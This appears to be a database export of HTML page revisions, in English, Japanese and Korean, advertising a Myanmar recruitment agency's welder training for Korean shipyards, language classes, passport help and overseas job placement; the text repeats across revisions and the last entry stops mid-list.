('page', 0, 24, 253, 'ja', 0, '<p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 253, 'ko', 0, '<p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p>', '', 'full_html'),
('page', 0, 24, 254, 'en', 0, '<p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 254, 'ja', 0, '<p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 254, 'ko', 0, '<p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 277, 'en', 0, '<img data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" width=\"100%\" data-align=\"center\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 277, 'ja', 0, '<p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 277, 'ko', 0, '<p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 278, 'en', 0, '<img data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" width=\"100%\" data-align=\"center\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 278, 'ja', 0, '<img data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; 